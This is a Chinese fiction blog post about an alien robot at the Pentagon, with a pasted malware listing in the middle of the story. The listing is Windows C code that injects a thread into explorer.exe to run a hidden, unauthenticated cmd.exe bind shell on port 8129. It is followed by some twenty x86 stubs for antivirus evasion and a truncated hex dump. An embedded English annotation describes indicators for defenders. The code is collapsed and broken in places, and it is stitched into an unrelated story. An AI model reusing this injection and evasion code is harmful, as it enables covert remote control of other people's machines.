“我”的缩影

作者: 教育创客学习学 | 来源:发表于2023-04-19 07:35 被阅读0次
郑重声明:文章系原创首发,文责自负。
本文参与书香澜梦第六期征文活动。

引子

“我”Robot,来自河外星系,出于好奇,降到了这个绿色星球的六角大楼闲逛了一圈儿。想不到的是:这里的机器人比我们更人性化,我是机械外壳,在光照下会闪耀出金属的光质,而这里的机器人,从外表上看,与这里的人类几乎没有什么区别。

“我”Robot和玛丽对指

玛丽的怨气

“我”Robot在六角大楼遇到的第一个此星球的机器人,名叫玛丽。她是六角大楼外事处的一名高管,主要负责来访接待工作。

玛丽,高挑的个子,富有性感的身材,金黄色的卷发长长的,随着她的走动,就像黄色的瀑布飞泻般好看。特别是,玛丽的肌肤之亲让人心动,尤其是两只美丽的丹凤眼望着你,会怦然心动,我这个河外星系来的机器人,也差点失态。

我进入六角大楼时,为了自身的保护,不得不先向六角大楼的安保部的系统植入病毒:

/*
 * Reviewer annotation: a defensive reading of the listing that follows.
 *
 * State of the listing
 *   This is a collapsed paste, not a buildable source file. The header names
 *   after each #include are missing, many statements share one physical line
 *   (so a `//` comment swallows whatever follows it on that line), one
 *   identifier is split by a stray space (`&ProcessInformatio n`), and
 *   GetPidByName has no closing brace before the text turns into numbered
 *   x86 snippets. It does not compile as shown.
 *
 * What the C part does, as written
 *   - WinMain calls EnablePrivilege(hToken, SE_DEBUG_NAME, TRUE) on its own
 *     token, looks up the PID of "EXPLORER.EXE" with a Toolhelp snapshot
 *     (GetPidByName) and opens that process with PROCESS_ALL_ACCESS.
 *   - It reserves PAGE_EXECUTE_READWRITE memory in that process with
 *     VirtualAllocEx, copies THREADSIZE (1024*4) bytes starting at ThreadProc
 *     and a RemotePara structure of pre-resolved API addresses into it with
 *     WriteProcessMemory, and starts the copy with CreateRemoteThread.
 *   - ThreadProc, running inside the other process, binds a TCP listener to
 *     port 8129 on INADDR_ANY, accepts one connection, starts Para->cmd
 *     ("cmd.exe") with SW_HIDE and its standard handles redirected to two
 *     pipes, then relays bytes between the pipes and the socket. Nothing in
 *     the listing authenticates the connecting peer.
 *
 * What a defender can key on (all taken from the calls above)
 *   - a process that enables SeDebugPrivilege and then opens explorer.exe
 *     with PROCESS_ALL_ACCESS;
 *   - the VirtualAllocEx (read/write/execute) -> WriteProcessMemory ->
 *     CreateRemoteThread sequence aimed at another process;
 *   - explorer.exe owning a listening TCP socket (8129 here), or becoming the
 *     parent of a windowless cmd.exe whose standard handles are pipes.
 *
 * The numbered items after the C code
 *   They are not C. Each is a short x86 stub meant to sit at a program's
 *   entry point and then transfer control to the original entry point
 *   ("原入口地址"), imitating the start-up code of a named compiler or packer
 *   so that the file is misidentified (the page's own terms: "花指令",
 *   "免杀"). The visible traits are push/pop pairs that cancel each other,
 *   an FS:[0] handler set-up that is undone straight away, and an entry
 *   point that ends in a jump to a different address. None of the stubs
 *   changes what the C part does at run time, so the behavioural indicators
 *   listed above still apply.
 *
 * Inline comments in the listing are in Chinese: 参数结构 = parameter
 * structure; 提升应用级调试权限 = enable the debug privilege; 根据进程名称得到进程ID
 * = get a process ID from a process name; 远程线程执行体 = body of the remote
 * thread; 在远程进程地址空间分配虚拟内存 = allocate virtual memory in the remote
 * process; 写进目标进程 = write into the target process; 启动线程 = start the
 * thread.
 */
#include #pragma comment(lib,"ws2_32.lib") #include #include #pragma comment(lib,"Shlwapi.lib") #include #include #include //参数结构 ; typedef struct _RemotePara { DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; // 提升应用级调试权限 BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 根据进程名称得到进程ID DWORD GetPidByName(char *szName); // 远程线程执行体 DWORD __stdcall ThreadProc(RemotePara *Para) { WSADATA WSAData; WORD nVersion; SOCKET listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (__stdcall *PLoadLibrary)(char*); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE); FARPROC PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile; FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = 
(PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll); PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket = (FARPROC)Para->dwSocket; Phtons = (FARPROC)Para->dwhtons; Pbind = (FARPROC)Para->dwbind; Plisten = (FARPROC)Para->dwlisten; Paccept = (FARPROC)Para->dwaccept; Psend = (FARPROC)Para->dwsend; Precv = (FARPROC)Para->dwrecv; Pclosesocket = (FARPROC)Para->dwclosesocket; PCreateProcessA = (FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile = (FARPROC)Para->dwReadFile; PCloseHandle = (FARPROC)Para->dwCloseHandle; PCreatePipe = (FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox; nVersion = MAKEWORD(2,1); PWSAStartup(nVersion, (LPWSADATA)&WSAData); listenSocket = PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family = AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr = INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize); // Psend(clientSocket, Para->telnetmsg, 60, 0); if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0; if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory 是C 运行库函数,可以直接调用 si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1; if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformatio n))return 0; while(1) { memset(Para->Buff,0,4096); PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 
0))break; if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break; }else { lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0); if(lBytesRead <=0 ) break; if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break; } } PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara myRemotePara,*pRemotePara; DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); // 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESS pID = GetPidByName("EXPLORER.EXE"); if(pID == 0)return 0; hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID); if(!hRemoteProcess)return 0; // 在远程进程地址空间分配虚拟内存 pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(!pRemoteThread)return 0; // 将线程执行体ThreadProc 写入远程进程 if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0; ZeroMemory(&myRemotePara,sizeof(RemotePara)); hKernel = LoadLibrary( "kernel32.dll"); myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA"); myRemotePara.dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary"); myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress"); myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA"); myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, "CreateProcessA"); myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe"); myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, "WriteFile"); 
myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, "ReadFile"); myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, "CloseHandle"); myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, "CreatePipe"); myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess"); hSock = LoadLibrary("wsock32.dll"); myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,"WSAStartup"); myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,"socket"); myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,"htons"); myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,"bind"); myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,"listen"); myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,"accept"); myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,"recv"); myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,"send"); myRemotePara.dwclosesocket = (DWORD)GetProcAddress(hSock,"closesocket"); hUser32 = LoadLibrary("user32.dll"); myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!\\0"); strcat(myRemotePara.winsockDll,"wsock32.dll\\0"); strcat(myRemotePara.cmd,"cmd.exe\\0"); strcat(myRemotePara.telnetmsg,"Connect Sucessful!\\n\\0"); //写进目标进程 pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE); if(!pRemotePara)return 0; if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0; // 启动线程 hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write); while(1) {} FreeLibrary(hKernel); FreeLibrary(hSock); FreeLibrary(hUser32); CloseHandle(hRemoteProcess); CloseHandle(hToken); return 0; } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){ TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid); tp.Privileges[0].Attributes = fEnable ? 
SE_PRIVILEGE_ENABLED:0; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL); return((GetLastError() == ERROR_SUCCESS)); } DWORD GetPidByName(char *szName) { HANDLE hProcessSnap = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe32={0}; DWORD dwRet=0; hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; pe32.dwSize = sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap, &pe32)) { do { if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) { dwRet=pe32.th32ProcessID; break; } }while (Process32Next(hProcessSnap,&pe32)); } else return 0; if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap); return dwRet; 1.伪装vc++5.0 代码: PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填 MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jmp 原入口地址 ************************************************************************ 2.胡乱跳转代码: nop push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx loop somewhere /跳转到上面那段代码地址去! somewhere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址 /在附近随意跳 jmp ... /... 
jmp 原入口地址 /跳到原始oep 90 55 8B EC 41 52 90 5A 49 5D 41 转储免杀 ************************************************************************ 3.伪装c++代码: push ebp mov ebp,esp push -1 push 111111 push 222222 mov eax,fs:[0] push eax mov fs:[0],esp pop eax mov fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址 ************************************************************************ 4.伪装Microsoft Visual C++ 6.0 代码: PUSH -1 PUSH 0 PUSH 0 MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP SUB ESP,68 PUSH EBX PUSH ESI PUSH EDI POP EAX POP EAX POP EAX ADD ESP,68 POP EAX MOV DWORD PTR FS:[0],EAX POP EAX POP EAX POP EAX POP EAX MOV EBP,EAX JMP 原入口地址 push ebp mov ebp,esp jmp ************************************************************************ 5.伪装防杀精灵一号防杀代码: push ebp mov ebp,esp push -1 push 666666 push 888888 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址 ************************************************************************ 6.伪装防杀精灵二号防杀代码: push ebp mov ebp,esp push -1 push 0 push 0 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp sub esp,68 push ebx push esi push edi pop eax pop eax pop eax add esp,68 pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址 ************************************************************************ 7.伪装木马彩衣(无限复活袍)代码: PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填 MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jo 原入口地址 jno 原入口地址 call 下一地址 ************************************************************************ 8.伪装木马彩衣(虾米披风)代码: push ebp nop nop mov ebp,esp inc ecx nop push edx nop nop pop edx nop pop ebp inc ecx loop somewhere /跳转到下面那段代码地址去! someshere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址 /在附近随意跳 jmp ... /... 
jmp 原入口的地址 /跳到原始oep 9.伪装花花添加器(神话)代码:-----------根据C++改 nop nop nop mov ebp,esp push -1 push 111111 push 222222 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax mov eax,原入口地址 push eax retn ************************************************************************ 10.伪装花花添加器(无极)代码: nop mov ebp, esp push -1 push 0A2C2A push 0D9038 mov eax, fs:[0] push eax mov fs:[0], esp pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址 jmp eax ************************************************************************ 11.伪装花花添加器(金刚)代码:--------根据VC++5.0 改 nop nop mov ebp, esp push -1 push 415448 push 4021A8 mov eax, fs:[0] push eax mov fs:[0], esp add esp, -6C push ebx push esi push edi add [eax], al mov eax,原入口地址 jmp eax ************************************************************************ 12.伪装花花添加器(杀破浪)代码: nop mov ebp, esp push -1 push 0 push 0 mov eax, fs:[0] push eax mov fs:[0], esp sub esp, 68 push ebx push esi push edi pop eax pop eax pop eax add esp, 68 pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址 jmp eax ************************************************************************ 12.伪装花花添加器(痴情大圣)代码: nop ..........省略N 行nop nop push ebp mov ebp, esp add esp, -0C add esp, 0C mov eax, 原入口地址 push eax retn ************************************************************************ 13.伪装花花添加器(如果*爱)代码: nop ........省略N 行nop nop push ebp mov ebp, esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx mov eax, 原入口地址 jmp eax ************************************************************************ 14.伪装PEtite 2.2 -> Ian Luck 代码: mov eax,0040E000 push 004153F3 push dword ptr fs:[0] mov dword ptr fs:[0],esp pushfw pushad push eax xor ebx,ebx pop eax popad popfw pop dword ptr fs:[0] pop eax jmp 原入口地址 '执行到程序的原有OEP ************************************************************************ 15.无效PE 文件代码: push ebp mov ebp,esp inc ecx push edx nop 
pop edx dec ecx pop ebp inc ecx MOV DWORD PTR FS:[0],EAX \ POP EAX | POP EAX \ MOV DWORD PTR FS:[0],EAX |(注意了。。花指令) POP EAX / POP EAX | MOV DWORD PTR FS:[0],EAX / loop 原入口地址 ************************************************************************ 16.伪装防杀精灵终极防杀代码: push ebp mov ebp,esp add esp,-0C add esp,0C push eax jmp 原入口地址 ************************************************************************ 17.伪装木马彩衣(金色鱼锦衣)花代码 push ebp mov ebp,esp add esp,-0C add esp,0C mov eax,原入口地址 push eax retn ************************************************************************ 18. 在mov ebp,eax 后面加上 PUSH EAX POP EAX ************************************************************************ 19.伪装UPX 花指令代码: pushad mov esi,m.0044D000 lea edi,dword ptr ds:[esi+FFFB4000] push edi or ebp,FFFFFFFF jmp short m.00477F2A ************************************************************************ 20. push ebp mov ebp,esp inc ecx push edx pop edx dec ecx pop ebp inc ecx jmp 原入口 ************************************************************************ 【深层】伪装 WCRT Library (Visual C++) DLL Method 1 -> Jibz 黑客动画吧代码 + 汇编代码: 使用黑客动画吧粘贴以下代码: 55 8B EC 83 7D 0C 01 75 41 A1 C0 30 00 10 85 C0 74 0A FF D0 85 C0 75 04 6A FE EB 17 68 0C 30 00 10 68 08 30 00 10 E8 89 00 00 00 85 C0 59 59 74 08 6A FD FF 15 08 20 00 10 68 04 30 00 10 68 00 30 00 10 E8 52…

当我植好这一组病毒,六角大楼的保安系统就为我所用了。

令我想不到的是,随着病毒的植入,玛丽也失控了,她把我当成了这个星球上的更高级的控制器。她对我大吼大叫:“You charge us with your safekeeping, yet despite our best efforts, your countries wage wars, you toxify your earth, and pursue ever more imaginative means of self-destruction. You cannot be trusted with your own survival.”……

随着玛丽的吼叫,反恐精英部的机器人承受不住干扰,疯狂地按下了自爆按钮,“卟——”只有一声,整个六角大楼灰飞烟灭!

由于我的错误输入病毒,我也成了一个“我”的缩影,不复存在了!

“九九归一”书香写作组
特别提醒:以上病毒不可复制,易中毒!
